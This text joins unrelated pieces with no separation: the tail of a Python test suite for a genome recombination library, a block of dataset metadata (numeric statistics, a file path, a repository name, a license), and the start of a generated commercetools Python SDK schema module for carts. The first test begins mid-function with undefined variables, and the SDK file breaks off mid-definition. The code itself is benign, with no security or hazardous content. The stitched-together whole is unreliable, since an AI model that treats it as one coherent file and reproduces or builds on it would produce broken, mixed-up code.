middle = "ccagtcgctgaggcagtcgatgcaggcatcgatcaggctggcacctgtgagccgagctcacgtatgcatcatcattga"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacatagctagtactagtcacgtagtcatttgtcgtacgtacgtattgagtcatca"
replaced = "gactacgatcagtcgtagtaacgcgtagcgtagtcagcgtacacgtacgtagacgacgtacatgcatcgtactgtatc"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(False, template)
r = find_swap_region(g, cassette, arm_len, design_primers=True)
self.assertEquals(len(r), 1)
self.assertEquals(len(r[0].verification_cassette), 5)
self.assertEquals(len(r[0].verification_front), 5)
self.assertEquals(len(r[0].verification_back), 5)
# cassette same as region to be replaced, front and back verification
# primers are not useful
cassette = ''.join([front_bs, middle, back_bs])
r = find_swap_region(g, cassette, arm_len, design_primers=True)
self.assertEquals(len(r), 1)
self.assertEquals(len(r[0].verification_cassette), 5)
self.assertEquals(len(r[0].verification_front), 0)
self.assertEquals(len(r[0].verification_back), 0)
class SingleCrossoverTest(TestCase):
    """Tests integrating a cassette via a single crossover at one homologous locus."""

    def setUp(self):
        # shrink the junction-check windows and the allowed single-crossover
        # gap so short synthetic sequences can exercise these code paths
        self.old_check_junction_lu = edge.recombine.CHECK_JUNCTION_LEFT_UP
        self.old_check_junction_ld = edge.recombine.CHECK_JUNCTION_LEFT_DN
        self.old_check_junction_ru = edge.recombine.CHECK_JUNCTION_RIGHT_UP
        self.old_check_junction_rd = edge.recombine.CHECK_JUNCTION_RIGHT_DN
        edge.recombine.CHECK_JUNCTION_LEFT_UP = 10
        edge.recombine.CHECK_JUNCTION_LEFT_DN = 40
        edge.recombine.CHECK_JUNCTION_RIGHT_UP = 40
        edge.recombine.CHECK_JUNCTION_RIGHT_DN = 10
        self.old_single_cross_over_gap_max = edge.recombine.SINGLE_CROSSOVER_MAX_GAP
        self.new_max_gap = 20
        edge.recombine.SINGLE_CROSSOVER_MAX_GAP = self.new_max_gap

    def tearDown(self):
        # restore the module-level tuning constants changed in setUp
        edge.recombine.CHECK_JUNCTION_LEFT_UP = self.old_check_junction_lu
        edge.recombine.CHECK_JUNCTION_LEFT_DN = self.old_check_junction_ld
        edge.recombine.CHECK_JUNCTION_RIGHT_UP = self.old_check_junction_ru
        edge.recombine.CHECK_JUNCTION_RIGHT_DN = self.old_check_junction_rd
        edge.recombine.SINGLE_CROSSOVER_MAX_GAP = self.old_single_cross_over_gap_max

    def build_genome(self, circular, *templates):
        """Create a genome with one fragment per template and rebuild blast DBs."""
        g = Genome(name='Foo')
        g.save()
        for seq in templates:
            f = Fragment.create_with_sequence('Bar', seq, circular=circular)
            Genome_Fragment(genome=g, fragment=f, inherited=False).save()
            try:
                os.unlink(fragment_fasta_fn(f))
            except OSError:
                # fasta not generated yet for this fragment; nothing to remove
                pass
        build_all_genome_dbs(refresh=True)
        return Genome.objects.get(pk=g.id)

    def test_single_crossover_integrates_correctly(self):
        """A back-half|insertion|front-half cassette inserts inside the locus."""
        upstream = "gagattgtccgcgtttt"
        locus = "catagcgcacaggacgcggagtaggcgtagtcggttgatctgatgtc"
        downstream = "gttaaggcgcgaacat"
        insertion = "aaaaaaaaaaaaaaaaaaa"
        locus_len = len(locus)
        bs_len = locus_len // 2
        template = ''.join([upstream, locus, downstream])
        cassette = ''.join([locus[locus_len - bs_len:], insertion, locus[0:bs_len]])
        g = self.build_genome(False, template)
        c = recombine(g, cassette, bs_len - 2)
        self.assertNotEqual(g.id, c.id)
        self.assertEqual(c.fragments.all()[0].indexed_fragment().sequence,
                         ''.join([upstream, locus, insertion, locus, downstream]))

    def test_single_crossover_integrates_correctly_with_gap_in_homology(self):
        """Integration still succeeds when the homology arms leave a small gap."""
        upstream = "gagattgtccgcgtttt"
        locus = "catagcgcacaggacgcggagtaggcgtagtcggttgatctgatgtc"
        downstream = "gttaaggcgcgaacat"
        insertion = "aaaaaaaaaaaaaaaaaaa"
        locus_len = len(locus)
        # floor division: `/` would make gap (and bs_len) a float under
        # Python 3, breaking the slice indices below
        gap = self.new_max_gap // 2
        arm_short = 2
        bs_len = locus_len // 2 - (gap - arm_short)
        template = ''.join([upstream, locus, downstream])
        cassette = ''.join([locus[locus_len - bs_len:], insertion, locus[0:bs_len]])
        g = self.build_genome(False, template)
        c = recombine(g, cassette, bs_len - arm_short)
        self.assertNotEqual(g.id, c.id)
        self.assertEqual(c.fragments.all()[0].indexed_fragment().sequence,
                         ''.join([upstream, locus, insertion, locus, downstream]))

    def test_single_crossover_integrates_correctly_with_reverse_complement_of_locus(self):
        """Single crossover also works with a reverse-complement cassette."""
        upstream = "gagattgtccgcgtttt"
        locus = "catagcgcacaggacgcggagtaggcgtagtcggttgatctgatgtc"
        downstream = "gttaaggcgcgaacat"
        insertion = "aaaaaaaaaaaaaaaaaaa"
        locus_len = len(locus)
        bs_len = locus_len // 2
        template = ''.join([upstream, locus, downstream])
        cassette = ''.join([locus[locus_len - bs_len:], insertion, locus[0:bs_len]])
        cassette = str(Seq(cassette).reverse_complement())
        g = self.build_genome(False, template)
        c = recombine(g, cassette, bs_len - 2)
        self.assertNotEqual(g.id, c.id)
        self.assertEqual(c.fragments.all()[0].indexed_fragment().sequence,
                         ''.join([upstream, locus, insertion, locus, downstream]))

    def test_single_crossover_integrates_correctly_with_reverse_complement_and_gap_in_locus(self):
        """Reverse-complement cassette with a homology gap still integrates."""
        upstream = "gagattgtccgcgtttt"
        locus = "catagcgcacaggacgcggagtaggcgtagtcggttgatctgatgtc"
        downstream = "gttaaggcgcgaacat"
        insertion = "aaaaaaaaaaaaaaaaaaa"
        locus_len = len(locus)
        # floor division keeps gap an int (see gap-in-homology test above)
        gap = self.new_max_gap // 2
        arm_short = 2
        bs_len = locus_len // 2 - (gap - arm_short)
        template = ''.join([upstream, locus, downstream])
        cassette = ''.join([locus[locus_len - bs_len:], insertion, locus[0:bs_len]])
        cassette = str(Seq(cassette).reverse_complement())
        g = self.build_genome(False, template)
        c = recombine(g, cassette, bs_len - arm_short)
        self.assertNotEqual(g.id, c.id)
        self.assertEqual(c.fragments.all()[0].indexed_fragment().sequence,
                         ''.join([upstream, locus, insertion, locus, downstream]))
| 45.992196
| 99
| 0.641498
| 4,696
| 41,255
| 5.407155
| 0.050468
| 0.100819
| 0.048874
| 0.05104
| 0.932932
| 0.917021
| 0.89414
| 0.88138
| 0.876772
| 0.865942
| 0
| 0.011868
| 0.240189
| 41,255
| 896
| 100
| 46.043527
| 0.798188
| 0.01481
| 0
| 0.824586
| 0
| 0
| 0.11474
| 0.050405
| 0
| 0
| 0
| 0
| 0.243094
| 1
| 0.059392
| false
| 0.004144
| 0.012431
| 0
| 0.078729
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1a4ff4ec915f23e7c019a823ef18c805568717f8
| 93,000
|
py
|
Python
|
src/commercetools/platform/models/_schemas/cart.py
|
lime-green/commercetools-python-sdk
|
63b77f6e5abe43e2b3ebbf3cdbbe00c7cf80dca6
|
[
"MIT"
] | 1
|
2021-04-07T20:01:30.000Z
|
2021-04-07T20:01:30.000Z
|
src/commercetools/platform/models/_schemas/cart.py
|
lime-green/commercetools-python-sdk
|
63b77f6e5abe43e2b3ebbf3cdbbe00c7cf80dca6
|
[
"MIT"
] | null | null | null |
src/commercetools/platform/models/_schemas/cart.py
|
lime-green/commercetools-python-sdk
|
63b77f6e5abe43e2b3ebbf3cdbbe00c7cf80dca6
|
[
"MIT"
] | null | null | null |
# Generated file, please do not change!!!
import re
import typing
import marshmallow
import marshmallow_enum
from commercetools import helpers
from ... import models
from ..cart import (
CartOrigin,
CartState,
DiscountCodeState,
InventoryMode,
LineItemMode,
LineItemPriceMode,
RoundingMode,
ShippingMethodState,
TaxCalculationMode,
TaxMode,
)
from ..common import ReferenceTypeId
from .common import (
BaseResourceSchema,
LocalizedStringField,
ReferenceSchema,
ResourceIdentifierSchema,
)
from .type import FieldContainerField
# Fields
# Marshmallow Schemas
class CartSchema(BaseResourceSchema):
    """Marshmallow schema (de)serializing the commercetools `Cart` resource.

    Generated code: each field mirrors the Cart API model. `data_key` maps
    the API's camelCase names onto snake_case attributes, `missing=None`
    makes fields optional on load, and `metadata={"omit_empty": True}`
    drops absent values on dump.
    """

    key = marshmallow.fields.String(allow_none=True, missing=None)
    last_modified_by = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.LastModifiedBySchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="lastModifiedBy",
    )
    created_by = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.CreatedBySchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="createdBy",
    )
    customer_id = marshmallow.fields.String(
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="customerId",
    )
    customer_email = marshmallow.fields.String(
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="customerEmail",
    )
    anonymous_id = marshmallow.fields.String(
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="anonymousId",
    )
    store = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".store.StoreKeyReferenceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
    )
    line_items = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".LineItemSchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="lineItems",
    )
    custom_line_items = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".CustomLineItemSchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="customLineItems",
    )
    # polymorphic money value: the concrete schema is chosen at load time
    # by the payload's "type" field
    total_price = helpers.Discriminator(
        allow_none=True,
        discriminator_field=("type", "type"),
        discriminator_schemas={
            "centPrecision": helpers.absmod(
                __name__, ".common.CentPrecisionMoneySchema"
            ),
            "highPrecision": helpers.absmod(
                __name__, ".common.HighPrecisionMoneySchema"
            ),
        },
        missing=None,
        data_key="totalPrice",
    )
    taxed_price = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".TaxedPriceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="taxedPrice",
    )
    cart_state = marshmallow_enum.EnumField(
        CartState, by_value=True, allow_none=True, missing=None, data_key="cartState"
    )
    shipping_address = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.AddressSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="shippingAddress",
    )
    billing_address = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.AddressSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="billingAddress",
    )
    inventory_mode = marshmallow_enum.EnumField(
        InventoryMode,
        by_value=True,
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="inventoryMode",
    )
    tax_mode = marshmallow_enum.EnumField(
        TaxMode, by_value=True, allow_none=True, missing=None, data_key="taxMode"
    )
    tax_rounding_mode = marshmallow_enum.EnumField(
        RoundingMode,
        by_value=True,
        allow_none=True,
        missing=None,
        data_key="taxRoundingMode",
    )
    tax_calculation_mode = marshmallow_enum.EnumField(
        TaxCalculationMode,
        by_value=True,
        allow_none=True,
        missing=None,
        data_key="taxCalculationMode",
    )
    customer_group = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".customer_group.CustomerGroupReferenceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="customerGroup",
    )
    country = marshmallow.fields.String(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    shipping_info = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ShippingInfoSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="shippingInfo",
    )
    discount_codes = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".DiscountCodeInfoSchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="discountCodes",
    )
    custom = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".type.CustomFieldsSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
    )
    payment_info = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".order.PaymentInfoSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="paymentInfo",
    )
    locale = marshmallow.fields.String(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    delete_days_after_last_modification = marshmallow.fields.Integer(
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="deleteDaysAfterLastModification",
    )
    refused_gifts = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".cart_discount.CartDiscountReferenceSchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
        data_key="refusedGifts",
    )
    origin = marshmallow_enum.EnumField(
        CartOrigin, by_value=True, allow_none=True, missing=None
    )
    # polymorphic: "Classification" vs "Score" shipping-rate input,
    # dispatched on the payload's "type" field
    shipping_rate_input = helpers.Discriminator(
        allow_none=True,
        discriminator_field=("type", "type"),
        discriminator_schemas={
            "Classification": helpers.absmod(
                __name__, ".ClassificationShippingRateInputSchema"
            ),
            "Score": helpers.absmod(__name__, ".ScoreShippingRateInputSchema"),
        },
        metadata={"omit_empty": True},
        missing=None,
        data_key="shippingRateInput",
    )
    item_shipping_addresses = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.AddressSchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="itemShippingAddresses",
    )

    class Meta:
        # silently ignore unknown keys in incoming payloads
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build a `models.Cart` instance from the validated payload."""
        return models.Cart(**data)
class CartDraftSchema(helpers.BaseSchema):
    """Marshmallow schema for `CartDraft`, the payload used to create a Cart.

    Generated code: field definitions mirror the CartDraft API model;
    `data_key` maps camelCase API names to snake_case attributes.
    """

    currency = marshmallow.fields.String(allow_none=True, missing=None)
    customer_id = marshmallow.fields.String(
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="customerId",
    )
    customer_email = marshmallow.fields.String(
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="customerEmail",
    )
    customer_group = helpers.LazyNestedField(
        nested=helpers.absmod(
            __name__, ".customer_group.CustomerGroupResourceIdentifierSchema"
        ),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="customerGroup",
    )
    anonymous_id = marshmallow.fields.String(
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="anonymousId",
    )
    store = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".store.StoreResourceIdentifierSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
    )
    country = marshmallow.fields.String(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    inventory_mode = marshmallow_enum.EnumField(
        InventoryMode,
        by_value=True,
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="inventoryMode",
    )
    tax_mode = marshmallow_enum.EnumField(
        TaxMode,
        by_value=True,
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="taxMode",
    )
    tax_rounding_mode = marshmallow_enum.EnumField(
        RoundingMode,
        by_value=True,
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="taxRoundingMode",
    )
    tax_calculation_mode = marshmallow_enum.EnumField(
        TaxCalculationMode,
        by_value=True,
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="taxCalculationMode",
    )
    line_items = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".LineItemDraftSchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="lineItems",
    )
    custom_line_items = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".CustomLineItemDraftSchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="customLineItems",
    )
    shipping_address = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.AddressSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="shippingAddress",
    )
    billing_address = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.AddressSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="billingAddress",
    )
    shipping_method = helpers.LazyNestedField(
        nested=helpers.absmod(
            __name__, ".shipping_method.ShippingMethodResourceIdentifierSchema"
        ),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="shippingMethod",
    )
    external_tax_rate_for_shipping_method = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="externalTaxRateForShippingMethod",
    )
    custom = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".type.CustomFieldsDraftSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
    )
    locale = marshmallow.fields.String(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    delete_days_after_last_modification = marshmallow.fields.Integer(
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="deleteDaysAfterLastModification",
    )
    origin = marshmallow_enum.EnumField(
        CartOrigin,
        by_value=True,
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
    )
    # polymorphic draft input, dispatched on the payload's "type" field
    shipping_rate_input = helpers.Discriminator(
        allow_none=True,
        discriminator_field=("type", "type"),
        discriminator_schemas={
            "Classification": helpers.absmod(
                __name__, ".ClassificationShippingRateInputDraftSchema"
            ),
            "Score": helpers.absmod(__name__, ".ScoreShippingRateInputDraftSchema"),
        },
        metadata={"omit_empty": True},
        missing=None,
        data_key="shippingRateInput",
    )
    item_shipping_addresses = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".common.AddressSchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="itemShippingAddresses",
    )
    discount_codes = marshmallow.fields.List(
        marshmallow.fields.String(allow_none=True),
        allow_none=True,
        metadata={"omit_empty": True},
        missing=None,
        data_key="discountCodes",
    )

    class Meta:
        # silently ignore unknown keys in incoming payloads
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build a `models.CartDraft` instance from the validated payload."""
        return models.CartDraft(**data)
class CartPagedQueryResponseSchema(helpers.BaseSchema):
    """Schema for a paged query response of carts; loads into ``models.CartPagedQueryResponse``."""

    limit = marshmallow.fields.Integer(allow_none=True, missing=None)
    count = marshmallow.fields.Integer(allow_none=True, missing=None)
    # "total" is optional in the payload; omit_empty metadata marks it skippable on dump.
    total = marshmallow.fields.Integer(
        allow_none=True, metadata={"omit_empty": True}, missing=None
    )
    offset = marshmallow.fields.Integer(allow_none=True, missing=None)
    results = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".CartSchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
    )

    class Meta:
        # Silently drop unknown incoming fields instead of raising.
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.CartPagedQueryResponse(**data)
class CartReferenceSchema(ReferenceSchema):
    """Schema for a ``Reference`` to a cart; loads into ``models.CartReference``."""

    # Optional expanded cart object (present only when the reference was expanded).
    obj = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".CartSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
    )

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        # Drop the type_id loaded by the base ReferenceSchema: the model's
        # constructor does not take it as an argument.
        del data["type_id"]
        return models.CartReference(**data)
class CartResourceIdentifierSchema(ResourceIdentifierSchema):
    """Schema for a ``ResourceIdentifier`` pointing at a cart; loads into ``models.CartResourceIdentifier``."""

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        # Drop the type_id loaded by the base ResourceIdentifierSchema before
        # constructing the model.
        del data["type_id"]
        return models.CartResourceIdentifier(**data)
class CartUpdateSchema(helpers.BaseSchema):
    """Schema for a cart update request; loads into ``models.CartUpdate``.

    ``actions`` is a polymorphic list: each element is dispatched to the
    concrete action schema selected by the value of its ``action`` field.
    """

    version = marshmallow.fields.Integer(allow_none=True, missing=None)
    actions = marshmallow.fields.List(
        helpers.Discriminator(
            allow_none=True,
            # (payload key, model attribute) pair used to pick the schema below.
            discriminator_field=("action", "action"),
            discriminator_schemas={
                "addCustomLineItem": helpers.absmod(
                    __name__, ".CartAddCustomLineItemActionSchema"
                ),
                "addDiscountCode": helpers.absmod(
                    __name__, ".CartAddDiscountCodeActionSchema"
                ),
                "addItemShippingAddress": helpers.absmod(
                    __name__, ".CartAddItemShippingAddressActionSchema"
                ),
                "addLineItem": helpers.absmod(__name__, ".CartAddLineItemActionSchema"),
                "addPayment": helpers.absmod(__name__, ".CartAddPaymentActionSchema"),
                "addShoppingList": helpers.absmod(
                    __name__, ".CartAddShoppingListActionSchema"
                ),
                "applyDeltaToCustomLineItemShippingDetailsTargets": helpers.absmod(
                    __name__,
                    ".CartApplyDeltaToCustomLineItemShippingDetailsTargetsActionSchema",
                ),
                "applyDeltaToLineItemShippingDetailsTargets": helpers.absmod(
                    __name__,
                    ".CartApplyDeltaToLineItemShippingDetailsTargetsActionSchema",
                ),
                "changeCustomLineItemMoney": helpers.absmod(
                    __name__, ".CartChangeCustomLineItemMoneyActionSchema"
                ),
                "changeCustomLineItemQuantity": helpers.absmod(
                    __name__, ".CartChangeCustomLineItemQuantityActionSchema"
                ),
                "changeLineItemQuantity": helpers.absmod(
                    __name__, ".CartChangeLineItemQuantityActionSchema"
                ),
                "changeTaxCalculationMode": helpers.absmod(
                    __name__, ".CartChangeTaxCalculationModeActionSchema"
                ),
                "changeTaxMode": helpers.absmod(
                    __name__, ".CartChangeTaxModeActionSchema"
                ),
                "changeTaxRoundingMode": helpers.absmod(
                    __name__, ".CartChangeTaxRoundingModeActionSchema"
                ),
                "recalculate": helpers.absmod(__name__, ".CartRecalculateActionSchema"),
                "removeCustomLineItem": helpers.absmod(
                    __name__, ".CartRemoveCustomLineItemActionSchema"
                ),
                "removeDiscountCode": helpers.absmod(
                    __name__, ".CartRemoveDiscountCodeActionSchema"
                ),
                "removeItemShippingAddress": helpers.absmod(
                    __name__, ".CartRemoveItemShippingAddressActionSchema"
                ),
                "removeLineItem": helpers.absmod(
                    __name__, ".CartRemoveLineItemActionSchema"
                ),
                "removePayment": helpers.absmod(
                    __name__, ".CartRemovePaymentActionSchema"
                ),
                "setAnonymousId": helpers.absmod(
                    __name__, ".CartSetAnonymousIdActionSchema"
                ),
                "setBillingAddress": helpers.absmod(
                    __name__, ".CartSetBillingAddressActionSchema"
                ),
                "setCartTotalTax": helpers.absmod(
                    __name__, ".CartSetCartTotalTaxActionSchema"
                ),
                "setCountry": helpers.absmod(__name__, ".CartSetCountryActionSchema"),
                "setCustomField": helpers.absmod(
                    __name__, ".CartSetCustomFieldActionSchema"
                ),
                "setCustomLineItemCustomField": helpers.absmod(
                    __name__, ".CartSetCustomLineItemCustomFieldActionSchema"
                ),
                "setCustomLineItemCustomType": helpers.absmod(
                    __name__, ".CartSetCustomLineItemCustomTypeActionSchema"
                ),
                "setCustomLineItemShippingDetails": helpers.absmod(
                    __name__, ".CartSetCustomLineItemShippingDetailsActionSchema"
                ),
                "setCustomLineItemTaxAmount": helpers.absmod(
                    __name__, ".CartSetCustomLineItemTaxAmountActionSchema"
                ),
                "setCustomLineItemTaxRate": helpers.absmod(
                    __name__, ".CartSetCustomLineItemTaxRateActionSchema"
                ),
                "setCustomShippingMethod": helpers.absmod(
                    __name__, ".CartSetCustomShippingMethodActionSchema"
                ),
                "setCustomType": helpers.absmod(
                    __name__, ".CartSetCustomTypeActionSchema"
                ),
                "setCustomerEmail": helpers.absmod(
                    __name__, ".CartSetCustomerEmailActionSchema"
                ),
                "setCustomerGroup": helpers.absmod(
                    __name__, ".CartSetCustomerGroupActionSchema"
                ),
                "setCustomerId": helpers.absmod(
                    __name__, ".CartSetCustomerIdActionSchema"
                ),
                "setDeleteDaysAfterLastModification": helpers.absmod(
                    __name__, ".CartSetDeleteDaysAfterLastModificationActionSchema"
                ),
                "setKey": helpers.absmod(__name__, ".CartSetKeyActionSchema"),
                "setLineItemCustomField": helpers.absmod(
                    __name__, ".CartSetLineItemCustomFieldActionSchema"
                ),
                "setLineItemCustomType": helpers.absmod(
                    __name__, ".CartSetLineItemCustomTypeActionSchema"
                ),
                "setLineItemDistributionChannel": helpers.absmod(
                    __name__, ".CartSetLineItemDistributionChannelActionSchema"
                ),
                "setLineItemPrice": helpers.absmod(
                    __name__, ".CartSetLineItemPriceActionSchema"
                ),
                "setLineItemShippingDetails": helpers.absmod(
                    __name__, ".CartSetLineItemShippingDetailsActionSchema"
                ),
                "setLineItemTaxAmount": helpers.absmod(
                    __name__, ".CartSetLineItemTaxAmountActionSchema"
                ),
                "setLineItemTaxRate": helpers.absmod(
                    __name__, ".CartSetLineItemTaxRateActionSchema"
                ),
                "setLineItemTotalPrice": helpers.absmod(
                    __name__, ".CartSetLineItemTotalPriceActionSchema"
                ),
                "setLocale": helpers.absmod(__name__, ".CartSetLocaleActionSchema"),
                "setShippingAddress": helpers.absmod(
                    __name__, ".CartSetShippingAddressActionSchema"
                ),
                "setShippingMethod": helpers.absmod(
                    __name__, ".CartSetShippingMethodActionSchema"
                ),
                "setShippingMethodTaxAmount": helpers.absmod(
                    __name__, ".CartSetShippingMethodTaxAmountActionSchema"
                ),
                "setShippingMethodTaxRate": helpers.absmod(
                    __name__, ".CartSetShippingMethodTaxRateActionSchema"
                ),
                "setShippingRateInput": helpers.absmod(
                    __name__, ".CartSetShippingRateInputActionSchema"
                ),
                "updateItemShippingAddress": helpers.absmod(
                    __name__, ".CartUpdateItemShippingAddressActionSchema"
                ),
            },
        ),
        allow_none=True,
        missing=None,
    )

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        """Build the model object from the deserialized dict."""
        return models.CartUpdate(**data)
class CartUpdateActionSchema(helpers.BaseSchema):
    """Base schema for all cart update actions; loads into ``models.CartUpdateAction``.

    Concrete action schemas subclass this and drop the ``action`` discriminator
    in their own ``post_load``.
    """

    action = marshmallow.fields.String(allow_none=True, missing=None)

    class Meta:
        unknown = marshmallow.EXCLUDE

    @marshmallow.post_load
    def post_load(self, data, **kwargs):
        # The action name only selects the schema; the model does not take it.
        del data["action"]
        return models.CartUpdateAction(**data)
class CustomLineItemSchema(helpers.BaseSchema):
    """Schema for a custom line item on a cart; loads into ``models.CustomLineItem``.

    Money-typed fields are polymorphic on the ``type`` key
    (``centPrecision`` / ``highPrecision``).
    """

    id = marshmallow.fields.String(allow_none=True, missing=None)
    name = LocalizedStringField(allow_none=True, missing=None)
    money = helpers.Discriminator(
        allow_none=True,
        discriminator_field=("type", "type"),
        discriminator_schemas={
            "centPrecision": helpers.absmod(
                __name__, ".common.CentPrecisionMoneySchema"
            ),
            "highPrecision": helpers.absmod(
                __name__, ".common.HighPrecisionMoneySchema"
            ),
        },
        missing=None,
    )
    taxed_price = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".TaxedItemPriceSchema"),
        allow_none=True,
        unknown=marshmallow.EXCLUDE,
        metadata={"omit_empty": True},
        missing=None,
        data_key="taxedPrice",
    )
    total_price = helpers.Discriminator(
        allow_none=True,
        discriminator_field=("type", "type"),
        discriminator_schemas={
            "centPrecision": helpers.absmod(
                __name__, ".common.CentPrecisionMoneySchema"
            ),
            "highPrecision": helpers.absmod(
                __name__, ".common.HighPrecisionMoneySchema"
            ),
        },
        missing=None,
        data_key="totalPrice",
    )
    slug = marshmallow.fields.String(allow_none=True, missing=None)
    quantity = marshmallow.fields.Integer(allow_none=True, missing=None)
    state = helpers.LazyNestedField(
        nested=helpers.absmod(__name__, ".order.ItemStateSchema"),
        allow_none=True,
        many=True,
        unknown=marshmallow.EXCLUDE,
        missing=None,
    )
    tax_category = helpers.LazyNestedField(
